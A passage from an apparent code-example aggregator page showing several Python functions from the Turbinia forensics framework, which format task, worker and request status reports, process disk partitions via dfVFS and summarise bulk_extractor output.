            if task.get('report_priority') <= priority_filter:
                task_map['High Priority'].append(task)
            else:
                task_map[success_map[task.get('successful')]].append(task)

        # Generate report header
        report.append('\n')
        report.append(fmt.heading1('Turbinia report {0:s}'.format(request_id)))
        report.append(
            fmt.bullet('Processed {0:d} Tasks for user {1:s}'.format(
                num_results, requester)))

        # Print report data for tasks
        for success_type in success_types:
            report.append('')
            report.append(fmt.heading1('{0:s} Tasks'.format(success_type)))
            if not task_map[success_type]:
                report.append(fmt.bullet('None'))
            for task in task_map[success_type]:
                if full_report and success_type == success_types[0]:
                    report.extend(
                        self.format_task_detail(task, show_files=all_fields))
                else:
                    report.extend(self.format_task(task,
                                                   show_files=all_fields))

        return '\n'.join(report)
Example #24
    def _ProcessPartition(self, path_spec):
        """Generate RawDiskPartition from a PathSpec.

    Args:
      path_spec (dfvfs.PathSpec): dfVFS path spec.

    Returns:
      A new RawDiskPartition evidence item and a list of strings containing
      partition information to add to the status report.
    """
        status_report = []

        fs_path_spec = path_spec
        fs_location = None
        partition_location = None
        volume_index = None
        partition_index = None
        partition_offset = None
        partition_size = None
        lv_uuid = None

        # File system location / identifier
        is_lvm = False
        fs_location = getattr(path_spec, 'location', None)
        while path_spec.HasParent():
            type_indicator = path_spec.type_indicator
            if type_indicator == dfvfs_definitions.TYPE_INDICATOR_APFS_CONTAINER:
                # APFS volume index
                volume_index = getattr(path_spec, 'volume_index', None)

            if type_indicator in (
                    dfvfs_definitions.TYPE_INDICATOR_GPT,
                    dfvfs_definitions.TYPE_INDICATOR_LVM,
                    dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION):
                if fs_location in ('\\', '/'):
                    # Partition location / identifier
                    fs_location = getattr(path_spec, 'location', None)
                partition_location = getattr(path_spec, 'location', None)
                # Partition index
                partition_index = getattr(path_spec, 'part_index', None)

                if type_indicator == dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION:
                    volume_system = tsk_volume_system.TSKVolumeSystem()
                elif type_indicator == dfvfs_definitions.TYPE_INDICATOR_LVM:
                    is_lvm = True
                    volume_system = lvm_volume_system.LVMVolumeSystem()
                else:
                    volume_system = gpt_volume_system.GPTVolumeSystem()
                try:
                    volume_system.Open(path_spec)
                    volume_identifier = partition_location.replace('/', '')
                    volume = volume_system.GetVolumeByIdentifier(
                        volume_identifier)

                    if is_lvm:
                        # LVM Logical Volume UUID
                        lv_uuid = volume.GetAttribute('identifier')
                        if lv_uuid:
                            lv_uuid = lv_uuid.value

                    partition_offset = volume.extents[0].offset
                    partition_size = volume.extents[0].size
                except dfvfs_errors.VolumeSystemError as e:
                    raise TurbiniaException(
                        'Could not process partition: {0!s}'.format(e))
                break

            path_spec = path_spec.parent

        status_report.append(fmt.heading5('{0!s}:'.format(fs_location)))
        status_report.append(
            fmt.bullet('Filesystem: {0!s}'.format(
                fs_path_spec.type_indicator)))
        if volume_index is not None:
            status_report.append(
                fmt.bullet('Volume index: {0!s}'.format(volume_index)))
        if partition_index is not None:
            status_report.append(
                fmt.bullet('Partition index: {0!s}'.format(partition_index)))
            status_report.append(
                fmt.bullet('Partition offset: {0!s}'.format(partition_offset)))
            status_report.append(
                fmt.bullet('Partition size: {0!s}'.format(partition_size)))
        if volume_index is None and partition_index is None:
            status_report.append(
                fmt.bullet('Source evidence is a volume image'))

        # Not setting path_spec here as it will need to be generated for each task
        partition_evidence = DiskPartition(partition_location=fs_location,
                                           partition_offset=partition_offset,
                                           partition_size=partition_size,
                                           lv_uuid=lv_uuid)

        return partition_evidence, status_report
Example #25
    def format_task_status(self,
                           instance,
                           project,
                           region,
                           days=0,
                           task_id=None,
                           request_id=None,
                           group_id=None,
                           user=None,
                           all_fields=False,
                           full_report=False,
                           priority_filter=Priority.HIGH,
                           output_json=False,
                           report=None):
        """Formats the recent history for Turbinia Tasks.

    Args:
      instance (string): The Turbinia instance name (by default the same as the
          INSTANCE_ID in the config).
      project (string): The name of the project.
      region (string): The name of the zone to execute in.
      days (int): The number of days we want history for.
      task_id (string): The Id of the task.
      request_id (string): The Id of the request we want tasks for.
      group_id (string): Group Id of the requests.
      user (string): The user of the request we want tasks for.
      all_fields (bool): Include all fields for the task, including task,
          request ids and saved file paths.
      full_report (bool): Generate a full markdown report instead of just a
          summary.
      priority_filter (int): Output only a summary for Tasks with a value
          greater than the priority_filter.
      output_json (bool): Whether to return JSON output.
      report (string): Status report that will be returned.

    Returns:
      String of task status in JSON or human readable format.
    """
        if user and days == 0:
            days = 1000
        task_results = self.get_task_data(instance,
                                          project,
                                          region,
                                          days,
                                          task_id,
                                          request_id,
                                          group_id,
                                          user,
                                          output_json=output_json)
        if not task_results:
            return ''

        if output_json:
            return task_results

        # Sort all tasks by the report_priority so that tasks with a higher
        # priority are listed first in the report.
        for result in task_results:
            # 0 is a valid value, so checking against specific values
            if result.get('report_priority') in (None, ''):
                result['report_priority'] = Priority.LOW
        task_results = sorted(task_results, key=itemgetter('report_priority'))
        num_results = len(task_results)
        if not num_results:
            msg = 'No Turbinia Tasks found.'
            log.info(msg)
            return '\n{0:s}'.format(msg)

        # Build up data
        if report is None:
            report = []
        success_types = ['Successful', 'Failed', 'Scheduled or Running']
        success_values = [True, False, None]
        # Reverse mapping values to types
        success_map = dict(zip(success_values, success_types))
        # This is used for group ID status
        requests = defaultdict(dict)
        requester = task_results[0].get('requester')
        request_id = task_results[0].get('request_id')
        task_map = defaultdict(list)
        success_types.insert(0, 'High Priority')
        for task in task_results:
            if task.get('request_id') not in requests:
                requests[task.get('request_id')] = {
                    'Successful': 0,
                    'Failed': 0,
                    'Scheduled or Running': 0
                }
            requests[task.get('request_id')][success_map[task.get(
                'successful')]] += 1
            if task.get('report_priority') <= priority_filter:
                task_map['High Priority'].append(task)
            else:
                task_map[success_map[task.get('successful')]].append(task)

        if group_id:
            report.append('\n')
            report.append(
                fmt.heading1(
                    'Turbinia report for group ID {0:s}'.format(group_id)))
            for request_id, success_counts in requests.items():
                report.append(
                    fmt.bullet(
                        'Request Id {0:s} with {1:d} successful, {2:d} failed, and {3:d} running tasks.'
                        .format(request_id, success_counts['Successful'],
                                success_counts['Failed'],
                                success_counts['Scheduled or Running'])))
                if full_report:
                    self.format_task_status(instance,
                                            project,
                                            region,
                                            days=0,
                                            task_id=None,
                                            request_id=request_id,
                                            user=user,
                                            all_fields=all_fields,
                                            full_report=full_report,
                                            priority_filter=priority_filter,
                                            output_json=output_json,
                                            report=report)

            return '\n'.join(report)

        # Generate report header
        report.append('\n')
        report.append(fmt.heading1('Turbinia report {0:s}'.format(request_id)))
        report.append(
            fmt.bullet('Processed {0:d} Tasks for user {1:s}'.format(
                num_results, requester)))

        # Print report data for tasks
        for success_type in success_types:
            report.append('')
            report.append(fmt.heading1('{0:s} Tasks'.format(success_type)))
            if not task_map[success_type]:
                report.append(fmt.bullet('None'))
            task_counter = defaultdict(int)
            for task in task_map[success_type]:
                if full_report and success_type == success_types[0]:
                    report.extend(
                        self.format_task_detail(task, show_files=all_fields))
                elif success_type == success_types[2]:
                    report.extend(self.format_task(task,
                                                   show_files=all_fields))
                else:
                    task_counter['\n'.join(
                        self.format_task(task, show_files=all_fields))] += 1

            if task_counter:
                for k, v in task_counter.items():
                    if v == 1:
                        report.append(k)
                    else:
                        report.append('{0:s} x {1:d}'.format(k, v))

        return '\n'.join(report)
Example #26
    def _ProcessPartition(self, evidence_path, path_spec):
        """Generate RawDiskPartition from a PathSpec.

    Args:
      evidence_path (str): Local path of the parent evidence
      path_spec (dfvfs.PathSpec): dfVFS path spec.

    Returns:
      A new RawDiskPartition evidence item and a list of strings containing
      partition information to add to the status report.
    """
        status_report = []

        fs_path_spec = path_spec
        fs_location = None
        partition_location = None
        volume_index = None
        partition_index = None
        partition_offset = None
        partition_size = None

        # File system location / identifier
        fs_location = getattr(path_spec, 'location', None)
        while path_spec.HasParent():
            type_indicator = path_spec.type_indicator
            if type_indicator == dfvfs_definitions.TYPE_INDICATOR_APFS_CONTAINER:
                # APFS volume index
                volume_index = getattr(path_spec, 'volume_index', None)

            if type_indicator == dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION:
                if fs_location in ('\\', '/'):
                    # Partition location / identifier
                    fs_location = getattr(path_spec, 'location', None)
                partition_location = getattr(path_spec, 'location', None)
                # Partition index
                partition_index = getattr(path_spec, 'part_index', None)

                volume_system = tsk_volume_system.TSKVolumeSystem()
                try:
                    volume_system.Open(path_spec)
                    volume_identifier = partition_location.replace('/', '')
                    volume = volume_system.GetVolumeByIdentifier(
                        volume_identifier)

                    partition_offset = volume.extents[0].offset
                    partition_size = volume.extents[0].size
                except dfvfs_errors.VolumeSystemError as e:
                    raise TurbiniaException(
                        'Could not process partition: {0!s}'.format(e))
                break

            path_spec = path_spec.parent

        status_report.append(fmt.heading5('{0!s}:'.format(fs_location)))
        if partition_index:
            if volume_index is not None:
                status_report.append(
                    fmt.bullet('Volume index: {0!s}'.format(volume_index)))
            status_report.append(
                fmt.bullet('Partition index: {0!s}'.format(partition_index)))
            status_report.append(
                fmt.bullet('Partition offset: {0!s}'.format(partition_offset)))
            status_report.append(
                fmt.bullet('Partition size: {0!s}'.format(partition_size)))
        else:
            status_report.append(
                fmt.bullet('Source evidence is a volume image'))

        partition_evidence = RawDiskPartition(
            source_path=evidence_path,
            path_spec=fs_path_spec,
            partition_offset=partition_offset,
            partition_size=partition_size)

        return partition_evidence, status_report
Example #27
  def format_worker_status(
      self, instance, project, region, days=0, all_fields=False):
    """Formats the recent history for Turbinia Workers.

    Args:
      instance (string): The Turbinia instance name (by default the same as the
          INSTANCE_ID in the config).
      project (string): The name of the project.
      region (string): The name of the zone to execute in.
      days (int): The number of days we want history for.
      all_fields (bool): Include historical Task information for the worker.
    Returns:
      String of Request status
    """
    # Set number of days to retrieve data
    num_days = 7
    if days != 0:
      num_days = days
    task_results = self.get_task_data(instance, project, region, days=num_days)
    if not task_results:
      return ''

    # Sort task_results by last updated timestamp.
    task_results = sorted(
        task_results, key=itemgetter('last_update'), reverse=True)

    # Create dictionary of worker_node: {{task_id, task_update,
    # task_name, task_status}}
    workers_dict = {}
    scheduled_counter = 0
    for result in task_results:
      worker_node = result.get('worker_name')
      status = result.get('status')
      status = status if status else 'No task status'
      if worker_node and worker_node not in workers_dict:
        workers_dict[worker_node] = []
      if worker_node:
        task_dict = {}
        task_dict['task_id'] = result.get('id')
        task_dict['last_update'] = result.get('last_update')
        task_dict['task_name'] = result.get('name')
        task_dict['status'] = status
        # Check status for anything that is running.
        if 'running' in status:
          run_time = (datetime.now() -
                      result.get('last_update')).total_seconds()
          run_time = timedelta(seconds=run_time)
          task_dict['run_time'] = run_time
        else:
          run_time = result.get('run_time')
          task_dict['run_time'] = run_time if run_time else 'No run time.'
        workers_dict[worker_node].append(task_dict)
      else:
        # Track scheduled/unassigned Tasks for reporting.
        scheduled_counter += 1

    # Generate report header
    report = []
    report.append(
        fmt.heading1(
            'Turbinia report for Worker activity within {0:d} days'.format(
                num_days)))
    report.append(
        fmt.bullet('{0:d} Worker(s) found.'.format(len(workers_dict.keys()))))
    report.append(
        fmt.bullet(
            '{0:d} Task(s) unassigned or scheduled and pending Worker assignment.'
            .format(scheduled_counter)))
    for worker_node, tasks in workers_dict.items():
      report.append('')
      report.append(fmt.heading2('Worker Node: {0:s}'.format(worker_node)))
      # Append the statuses chronologically
      run_status, queued_status, other_status = [], [], []
      for task in tasks:
        if 'running' in task['status']:
          run_status.extend(self.format_worker_task(task))
        elif 'queued' in task['status']:
          queued_status.extend(self.format_worker_task(task))
        else:
          other_status.extend(self.format_worker_task(task))
      # Add each of the status lists back to report list
      not_found = [fmt.bullet('No Tasks found.')]
      report.append(fmt.heading3('Running Tasks'))
      report.extend(run_status if run_status else not_found)
      report.append('')
      report.append(fmt.heading3('Queued Tasks'))
      report.extend(queued_status if queued_status else not_found)
      # Add Historical Tasks
      if all_fields:
        report.append('')
        report.append(fmt.heading3('Finished Tasks'))
        report.extend(other_status if other_status else not_found)
    return '\n'.join(report)
Example #28
  def generate_summary_report(self, output_file_path):
    """Generate a summary report from the resulting bulk extractor run.

    Args:
      output_file_path(str): the path to the bulk extractor output.

    Returns:
      tuple: containing:
        report_text(str): The report data
        summary(str): A summary of the report (used for task status)
    """
    findings = []
    features_count = 0
    report_path = os.path.join(output_file_path, 'report.xml')

    # Check if report.xml was not generated by bulk extractor.
    if not os.path.exists(report_path):
      report = 'Execution successful, but the report is not available.'
      return (report, report)

    # Parse existing XML file.
    self.xml = xml_tree.parse(report_path)

    # Place in try/except statement to continue execution when
    # an attribute is not found and NoneType is returned.
    try:
      # Retrieve summary related results.
      findings.append(fmt.heading4('Bulk Extractor Results'))
      findings.append(fmt.heading5('Run Summary'))
      findings.append(
          fmt.bullet(
              'Program: {0} - {1}'.format(
                  self.check_xml_attrib('creator/program'),
                  self.check_xml_attrib('creator/version'))))
      findings.append(
          fmt.bullet(
              'Command Line: {0}'.format(
                  self.check_xml_attrib(
                      'creator/execution_environment/command_line'))))
      findings.append(
          fmt.bullet(
              'Start Time: {0}'.format(
                  self.check_xml_attrib(
                      'creator/execution_environment/start_time'))))
      findings.append(
          fmt.bullet(
              'Elapsed Time: {0}'.format(
                  self.check_xml_attrib('report/elapsed_seconds'))))

      # Retrieve results from each of the scanner runs
      feature_files = self.xml.find('feature_files')
      if feature_files is not None:
        feature_iter = feature_files.iter()
        findings.append(fmt.heading5('Scanner Results'))
        for f in feature_iter:
          if f.tag == 'feature_file':
            name = next(feature_iter)
            count = next(feature_iter)
            findings.append(fmt.bullet('{0}:{1}'.format(name.text, count.text)))
            features_count += int(count.text)
      else:
        findings.append(fmt.heading5("There are no findings to report."))
    except AttributeError as exception:
      log.warning(
          'Error parsing feature from Bulk Extractor report: {0!s}'.format(
              exception))
    summary = '{0} artifacts have been extracted.'.format(features_count)
    report = '\n'.join(findings)
    return (report, summary)
Example #29
  def format_request_status(
      self, instance, project, region, days=0, all_fields=False):
    """Formats the recent history for Turbinia Requests.

    Args:
      instance (string): The Turbinia instance name (by default the same as the
          INSTANCE_ID in the config).
      project (string): The name of the project.
      region (string): The name of the zone to execute in.
      days (int): The number of days we want history for.
      all_fields (bool): Include all fields for the Request, which includes,
          saved file paths.
    Returns:
      String of Request status
    """
    # Set number of days to retrieve data
    num_days = 7
    if days != 0:
      num_days = days
    task_results = self.get_task_data(instance, project, region, days=num_days)
    if not task_results:
      return ''

    # Sort task_results by last updated timestamp.
    task_results = sorted(
        task_results, key=itemgetter('last_update'), reverse=True)

    # Create dictionary of request_id: {saved_paths, last_update, requester,
    # task_id}
    request_dict = {}
    for result in task_results:
      request_id = result.get('request_id')
      saved_paths = result.get('saved_paths')
      if request_id not in request_dict:
        saved_paths = set(saved_paths) if saved_paths else set()
        request_dict[request_id] = {}
        request_dict[request_id]['saved_paths'] = saved_paths
        request_dict[request_id]['last_update'] = result.get('last_update')
        request_dict[request_id]['requester'] = result.get('requester')
        request_dict[request_id]['task_id'] = set([result.get('id')])
      else:
        if saved_paths:
          request_dict[request_id]['saved_paths'].update(saved_paths)
        request_dict[request_id]['task_id'].update([result.get('id')])

    # Generate report header
    report = []
    report.append(
        fmt.heading1(
            'Turbinia report for Requests made within {0:d} days'.format(
                num_days)))
    report.append(
        fmt.bullet(
            '{0:d} requests were made within this timeframe.'.format(
                len(request_dict.keys()))))
    # Print report data for Requests
    for request_id, values in request_dict.items():
      report.append('')
      report.append(fmt.heading2('Request ID: {0:s}'.format(request_id)))
      report.append(
          fmt.bullet(
              'Last Update: {0:s}'.format(
                  values['last_update'].strftime(DATETIME_FORMAT))))
      report.append(fmt.bullet('Requester: {0:s}'.format(values['requester'])))
      report.append(
          fmt.bullet('Task Count: {0:d}'.format(len(values['task_id']))))
      if all_fields:
        report.append(fmt.bullet('Associated Evidence:'))
        # Append all saved paths in request
        for path in sorted(values['saved_paths']):
          report.append(fmt.bullet(fmt.code(path), level=2))
        report.append('')
    return '\n'.join(report)